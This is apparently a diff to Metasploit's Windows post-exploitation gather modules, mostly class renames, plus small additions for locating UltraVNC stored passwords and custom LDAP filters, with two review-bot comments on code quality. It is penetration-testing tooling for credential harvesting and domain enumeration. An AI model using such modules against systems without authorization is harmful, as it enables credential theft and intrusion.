Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report 
@@ -108,6 +108,20 @@ class Metasploit3 < Msf::Post :port_variable => 'PortNumber='} end + #check uninstall key + begin + root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") + open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) + vnclocation = open_key.query_value("InstallLocation").data + locations << {:name => 'UltraVNC', + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + locations << {:name => 'WinVNC3_HKLM', :check_reg => 'HKLM\\Software\\ORL\\WinVNC3', :pass_variable => 'Password', diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 5af3bdb12d..ea3ebf955c 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index e9c4d452d1..3cc7a3dcd8 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'rex/parser/winscp' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index 1227e572e2..fafdd63add 100644 
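Review bot: The registry key opened in the added uninstall-key block of vnc.rb is never closed; `open_key` is used once for `query_value("InstallLocation")` and no `close` appears on either the success or the rescue path. Adding an `ensure` clause with `open_key.close if open_key` before the block's `end` releases the handle in both cases. The check path is built as `vnclocation + "\\ultravnc.ini"`, so an empty `InstallLocation` gives `\ultravnc.ini` and a value that already ends in a backslash gives a doubled separator. Wrapping the `locations <<` in `unless vnclocation.to_s.empty?` would skip the empty case. The enclosing method starts and ends outside the hunk.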
--- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/dnscache_dump.rb b/modules/post/windows/gather/dnscache_dump.rb index de4bf2fefb..b496b0d2cd 100644 --- a/modules/post/windows/gather/dnscache_dump.rb +++ b/modules/post/windows/gather/dnscache_dump.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 13d701aac1..58843c819b 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb index 2801d749ab..6c005e5342 100644 --- a/modules/post/windows/gather/enum_ad_bitlocker.rb +++ b/modules/post/windows/gather/enum_ad_bitlocker.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 27f3a742c3..0f395c1e53 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb 
@@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_groups.rb b/modules/post/windows/gather/enum_ad_groups.rb index ade732c27a..bf72dad0c7 100644 --- a/modules/post/windows/gather/enum_ad_groups.rb +++ b/modules/post/windows/gather/enum_ad_groups.rb @@ -6,10 +6,10 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP -# include Msf::Post::Windows::Accounts + # include Msf::Post::Windows::Accounts USER_FIELDS = ['name', 'distinguishedname', @@ -19,9 +19,9 @@ class Metasploit3 < Msf::Post super(update_info( info, 'Name' => 'Windows Gather Active Directory Groups', - 'Description' => %{ + 'Description' => %( This module will enumerate AD groups on the specified domain. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>' @@ -32,6 +32,7 @@ class Metasploit3 < Msf::Post register_options([ OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]), + OptString.new('FILTER', [false, 'Customised LDAP filter', nil]) ], self.class) end 
@@ -39,14 +40,16 @@ class Metasploit3 < Msf::Post @user_fields = USER_FIELDS.dup if datastore['ADDITIONAL_FIELDS'] - additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/,"").split(',') + additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',') @user_fields.push(*additional_fields) end max_search = datastore['MAX_SEARCH'] begin - q = query('(objectClass=group)', max_search, @user_fields) + f = "" + f = "(#{datastore['FILTER']})" if datastore['FILTER'] + q = query("(&(objectClass=group)#{f})", max_search, @user_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e # Can't bind or in a network w/ limited accounts print_error(e.message) @@ -68,8 +71,6 @@ class Metasploit3 < Msf::Post # @param [Array<Array<Hash>>] the LDAP query results to parse # @return [Rex::Ui::Text::Table] the table containing all the result data def parse_results(results) - domain = datastore['DOMAIN'] || get_domain - domain_ip = client.net.resolve.resolve_host(domain)[:ip] # Results table holds raw string data results_table = Rex::Ui::Text::Table.new( 'Header' => "Domain Groups", @@ -93,5 +94,4 @@ class Metasploit3 < Msf::Post end results_table end - end diff --git a/modules/post/windows/gather/enum_ad_managedby_groups.rb b/modules/post/windows/gather/enum_ad_managedby_groups.rb index 72959f6086..19644021fb 100644 --- a/modules/post/windows/gather/enum_ad_managedby_groups.rb +++ b/modules/post/windows/gather/enum_ad_managedby_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_service_principal_names.rb b/modules/post/windows/gather/enum_ad_service_principal_names.rb index 125c9feb59..c6a4badebb 100644 --- a/modules/post/windows/gather/enum_ad_service_principal_names.rb +++ b/modules/post/windows/gather/enum_ad_service_principal_names.rb 
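Review bot: A blank `FILTER` still adds an empty `()` term in this hunk, because `if datastore['FILTER']` is true for `""` in Ruby, so the query becomes `(&(objectClass=group)())`. The matching line in enum_ad_users.rb (hunk `@@ -146,6 +147,7 @@`) tests `!= ""` instead, which has the opposite gap: with the option's `nil` default the comparison is true and `()` would be appended when FILTER is unset, assuming the datastore returns nil for an unset option. One check used in both places covers nil and blank alike, e.g. `f = datastore['FILTER'].to_s.strip.empty? ? "" : "(#{datastore['FILTER']})"` here and `unless datastore['FILTER'].to_s.strip.empty?` as the modifier there. The option description could also state that the module wraps the value in parentheses, since a filter supplied with its own outer parentheses would be double-wrapped. The enclosing method begins outside the hunk.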
@@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_to_wordlist.rb b/modules/post/windows/gather/enum_ad_to_wordlist.rb index 33f37b1bcf..6da00f76ad 100644 --- a/modules/post/windows/gather/enum_ad_to_wordlist.rb +++ b/modules/post/windows/gather/enum_ad_to_wordlist.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_user_comments.rb b/modules/post/windows/gather/enum_ad_user_comments.rb index 22519eae57..d6759fb211 100644 --- a/modules/post/windows/gather/enum_ad_user_comments.rb +++ b/modules/post/windows/gather/enum_ad_user_comments.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb index 2fc5ed7779..23e17152cc 100644 --- a/modules/post/windows/gather/enum_ad_users.rb +++ b/modules/post/windows/gather/enum_ad_users.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP include Msf::Post::Windows::Accounts 
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post OptBool.new('EXCLUDE_LOCKED', [true, 'Exclude in search locked accounts..', false]), OptBool.new('EXCLUDE_DISABLED', [true, 'Exclude from search disabled accounts.', false]), OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]), + OptString.new('FILTER', [false, 'Customised LDAP filter', nil]), OptString.new('GROUP_MEMBER', [false, 'Recursively list users that are effectve members of the group DN specified.', nil]), OptEnum.new('UAC', [true, 'Filter on User Account Control Setting.', 'ANY', [ @@ -146,6 +147,7 @@ class Metasploit3 < Msf::Post inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED'] inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED'] inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER'] + inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] != "" case datastore['UAC'] when 'ANY' when 'NO_PASSWORD' diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index b3b2a25bab..a368256941 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index 2247ea9dc1..f07817d3c8 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File 
diff --git a/modules/post/windows/gather/enum_av_excluded.rb b/modules/post/windows/gather/enum_av_excluded.rb index 0aa167b783..3d04c4fb31 100644 --- a/modules/post/windows/gather/enum_av_excluded.rb +++ b/modules/post/windows/gather/enum_av_excluded.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry def initialize(info = {}) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index f1af882553..58f0b43137 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv @@ -278,7 +278,7 @@ class Metasploit3 < Msf::Post # If we can impersonate a token, we use that first. # If we can't, we'll try to MIGRATE (more aggressive) if the user wants to got_token = steal_token - if not got_token and datastore["MIGRATE"] + if !got_token && datastore["MIGRATE"] migrate_success = migrate end @@ -311,7 +311,7 @@ class Metasploit3 < Msf::Post else uid = session.sys.config.getuid print_status "Running as user '#{uid}'..." - usernames << env_vars['USERNAME'].strip + usernames << env_vars['USERNAME'].strip if env_vars['USERNAME'] end has_sqlite3 = true @@ -330,7 +330,7 @@ class Metasploit3 < Msf::Post end # Migrate back to the original process - if datastore["MIGRATE"] and @old_pid and migrate_success == true + if datastore["MIGRATE"] && @old_pid && migrate_success print_status("Migrating back...") migrate(@old_pid) end diff --git a/modules/post/windows/gather/enum_computers.rb b/modules/post/windows/gather/enum_computers.rb index 8ecc9ee524..bd66af39ba 100644 --- a/modules/post/windows/gather/enum_computers.rb +++ b/modules/post/windows/gather/enum_computers.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 27ff05d2ed..9a028e9058 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index 9829aa63e8..218cf88701 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index c772da1822..f92c1f433b 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index 6d1c252834..5e0c8a0832 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index f9c2f877a3..5d0f6a1414 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb 
+++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Gather Enumerate Domain Group', diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index c917d0be8d..a2808ec180 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index 2ebfbb3208..11077706ad 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -4,7 +4,7 @@ require 'msf/core/post/common' require 'msf/core/post/windows/registry' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 28dc44c576..01cbeb914e 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::NetAPI diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb index 3b28a296ed..46215718fe 100644 --- a/modules/post/windows/gather/enum_files.rb +++ b/modules/post/windows/gather/enum_files.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index 9f2d188091..3053a9d4a9 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/enum_ie.rb b/modules/post/windows/gather/enum_ie.rb index 846df38f16..85d9d7d0c3 100644 --- a/modules/post/windows/gather/enum_ie.rb +++ b/modules/post/windows/gather/enum_ie.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index fc5958c96c..702b5d3e1c 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index ae2d0bc3a6..f833df4511 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry 
diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 4644a8823a..425095613b 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'rex/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_patches.rb b/modules/post/windows/gather/enum_patches.rb index a6c4162dfd..2940456b5c 100644 --- a/modules/post/windows/gather/enum_patches.rb +++ b/modules/post/windows/gather/enum_patches.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/extapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 41ca9b2119..4a61411ee9 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index f6edb22bf1..328855c968 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index bb98d36e77..eec20ad528 100644 
--- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Post::Windows::Services diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb index 00d38c0806..8d06f9d8f2 100644 --- a/modules/post/windows/gather/enum_putty_saved_sessions.rb +++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index eff601943b..45423beb71 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Services diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index b0dfe05714..c3e144e7f5 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index 9316605288..b35a01b0d6 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb 
@@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index 2ad65c80e2..96369e9065 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index 4a7838d3cd..18ba14ec9d 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_tomcat.rb b/modules/post/windows/gather/enum_tomcat.rb index 2f98e036c6..3039d588e9 100644 --- a/modules/post/windows/gather/enum_tomcat.rb +++ b/modules/post/windows/gather/enum_tomcat.rb @@ -8,7 +8,7 @@ require 'rexml/document' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 09dea61737..348e8886f9 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/parser/unattend' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File 
diff --git a/modules/post/windows/gather/file_from_raw_ntfs.rb b/modules/post/windows/gather/file_from_raw_ntfs.rb index 2500d9226f..d48f1f77ef 100644 --- a/modules/post/windows/gather/file_from_raw_ntfs.rb +++ b/modules/post/windows/gather/file_from_raw_ntfs.rb @@ -5,7 +5,7 @@ require 'rex/parser/fs/ntfs' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error diff --git a/modules/post/windows/gather/forensics/browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb index 161789429b..fc8f75b4d1 100644 --- a/modules/post/windows/gather/forensics/browser_history.rb +++ b/modules/post/windows/gather/forensics/browser_history.rb @@ -10,7 +10,7 @@ require 'msf/core/post/windows/user_profiles' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/forensics/duqu_check.rb b/modules/post/windows/gather/forensics/duqu_check.rb index c967b5f6ab..95db9869cf 100644 --- a/modules/post/windows/gather/forensics/duqu_check.rb +++ b/modules/post/windows/gather/forensics/duqu_check.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index 34b24c51cb..a1bc92dd3b 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -11,7 +11,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, 
diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 209a90c492..9245efeb0d 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -14,7 +14,7 @@ require 'digest/md5' require 'digest/sha1' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index 2a029ce6a3..fe5704295f 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -14,7 +14,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/recovery_files.rb b/modules/post/windows/gather/forensics/recovery_files.rb index c32cfa7420..bae7105eee 100644 --- a/modules/post/windows/gather/forensics/recovery_files.rb +++ b/modules/post/windows/gather/forensics/recovery_files.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index 0f4b866d16..2e635e04b2 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index 96fbc11ccf..030a5c8874 100644 
--- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb index 812691a029..934785f84f 100644 --- a/modules/post/windows/gather/lsa_secrets.rb +++ b/modules/post/windows/gather/lsa_secrets.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb new file mode 100644 index 0000000000..3e7e35e884 --- /dev/null +++ b/modules/post/windows/gather/make_csv_orgchart.rb 
